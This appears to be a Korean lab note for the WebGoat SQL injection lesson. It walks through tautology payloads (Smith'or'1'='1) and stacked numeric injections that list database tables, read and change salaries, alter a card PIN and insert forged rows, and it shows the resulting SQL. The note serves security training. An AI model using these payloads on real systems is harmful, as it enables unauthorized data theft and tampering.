메뉴에서 Injection Flaws - SQL Injection (1~6 tab은 설명 / 7~8이 실행)

[예제 1 - String]

Account Name에 Smith 입력 => John, Smith 2개 나옴
SELECT * FROM user_data WHERE last_name = 'Smith'

Account Name에 Smith'or''=' 입력 => or, = 때문에 다수의 결과가 나옴
SELECT * FROM user_data WHERE last_name = 'Smith'or''=''

'Smith' or '' = '' 모든 값이 참이 되어 모든 값이 표시됨
'입력단어' 로 검색되는데 Smith'or''= 을 입력하면 밖에 '' 이 입력돼
'Smith' or '' = '' 가 됨
Smith'or'1'='1 을 입력하면 'Smith'or'1'='1'가 돼 같은 결과 
(or, = 앞 뒤 띄어도 무관/ 'Smith' or '1' = '1')

[예제 2 - Numeric]

기본 쿼리
"SELECT * FROM users WHERE employee_id = " + userID;

1) 데이터베이스 상에 존재하는 전체 테이블 확인
101;SELECT * FROM INFORMATION_SCHEMA.TABLES
SELECT * FROM users WHERE employee_id = 101;
SELECT * FROM INFORMATION_SCHEMA.TABLES;

2) 사원테이블 조회(사번101)
101;SELECT * FROM employee WHERE userid=101
SELECT * FROM users WHERE employee_id = 101;
SELECT * FROM employee WHERE userid=101;

3) 사원테이블에서 급여 조회(사번101)
101;SELECT salary FROM employee WHERE userid=101
SELECT * FROM users WHERE employee_id = 101;
SELECT salary FROM employee WHERE userid=101;

4) 사원테이블에서 급여 변경(사번101)
101;UPDATE employee SET salary=30 where userid=101
SELECT * FROM users WHERE employee_id = 101;
UPDATE employee SET salary=30 where userid=101;

5) 사원테이블에서 급여 변경 확인(사번101)
101;SELECT salary FROM employee WHERE userid=101
SELECT * FROM users WHERE employee_id = 101;
SELECT salary FROM employee WHERE userid=101;

6) 비밀번호 테이블에서 비밀번호 변경(카드번호 1111111111111111) - 추가연습
101;SELECT * FROM PINS

101;UPDATE PINS SET PIN=4444 where CC_NUMBER=1111111111111111
SELECT * FROM users WHERE employee_id = 101;
UPDATE PINS SET PIN=4444 where CC_NUMBER=1111111111111111;

7) 비밀번호 테이블에 임의 값 입력 - 추가연습
101;insert into pins values('4444444444444444','4444','HAHA');
SELECT * FROM users WHERE employee_id = 101;
insert into pins values('4444444444444444','4444','HAHA');
